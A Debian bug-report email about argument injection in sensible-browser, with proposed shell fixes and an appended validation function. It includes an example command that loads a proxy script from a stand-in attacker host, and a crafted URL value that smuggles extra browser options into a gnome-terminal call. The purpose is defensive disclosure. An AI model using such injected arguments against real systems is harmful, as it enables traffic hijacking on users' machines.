Hi,

> Source: sensible-utils
> Source-Version: 0.0.11
> 
> We believe that the bug you reported is fixed in the latest version of
> sensible-utils, which is due to be installed in the Debian FTP archive.

I can't find the source of the new version yet so I can't review it
yet.

I think we need to exclude URIs starting with `-` or `--` as
well. Otherwise an attacker might pass flags (such as
--proxy-pac-url=http://evil.example.com/proxy.pac) with:

    BROWSER=chromium sensible-browser --proxy-pac-url=http://evil.example.com/proxy.pac

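Something like:

  # '-' is placed last in the bracket expression: a backslash is literal
  # there, so '\-.' would be parsed as an invalid range.
  if ! echo -n "$URL" | head -n1 | grep '^[a-zA-Z][a-zA-Z0-9+.-]*:' > /dev/null ; then
    exit 1
  fi

or:

  # Same bracket expression as above, with '-' last.
  if ! echo -n "$URL" | grep -z '^[a-zA-Z][a-zA-Z0-9+.-]*:' > /dev/null ; then
    exit 1
  fi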

or:

  case "$1" in
      -*)
          exit 1
          ;;
      *)
          true
          ;;
  esac

By the way, this line is vulnerable as well:

  exec /usr/bin/gnome-terminal -e "/usr/bin/www-browser ${URL:+\"$URL\"}"

For example:

  URL='http://www.example.com/"; "--incognito' ; /usr/bin/gnome-terminal -e "chromium ${URL:+\"$URL\"}"

A possible fix is to use:

  exec /usr/bin/gnome-terminal -- "/usr/bin/www-browser" ${URL:+"$URL"}

Cheers,

-- 
Gabriel
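
The two checks suggested in this message (reject a leading `-`, require a URI scheme) combined into one POSIX sh function without grep, as an added example that is not part of the original mail or of sensible-utils. The names `url_is_safe` and `count_rejected` are hypothetical and the inputs used with them are constructed.

```shell
#!/bin/sh
# Added example, not sensible-utils code. url_is_safe and count_rejected
# are hypothetical helper names.
LC_ALL=C   # byte-wise character ranges in the patterns below

# Return 0 only when the whole argument looks like "<scheme>:<rest>".
url_is_safe() {
    url=$1
    # Reject anything a browser could parse as a command-line option.
    case "$url" in
        -*) return 1 ;;
    esac
    # No colon at all means no scheme.
    case "$url" in
        *:*) ;;
        *) return 1 ;;
    esac
    # Text before the first colon. The expansion works on the whole string,
    # so an embedded newline cannot hide a bad first line from the check.
    scheme=${url%%:*}
    case "$scheme" in
        ''|[!a-zA-Z]*) return 1 ;;        # must start with a letter
        *[!a-zA-Z0-9+.-]*) return 1 ;;    # only scheme characters allowed
    esac
    return 0
}

# Print how many of the given (constructed) candidates are rejected.
count_rejected() {
    rejected=0
    for candidate in "$@"; do
        url_is_safe "$candidate" || rejected=$((rejected + 1))
    done
    echo "$rejected"
}
```

The quote-injection URL from the message has a valid scheme and passes this check, so the gnome-terminal line still needs the separate `--` fix.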
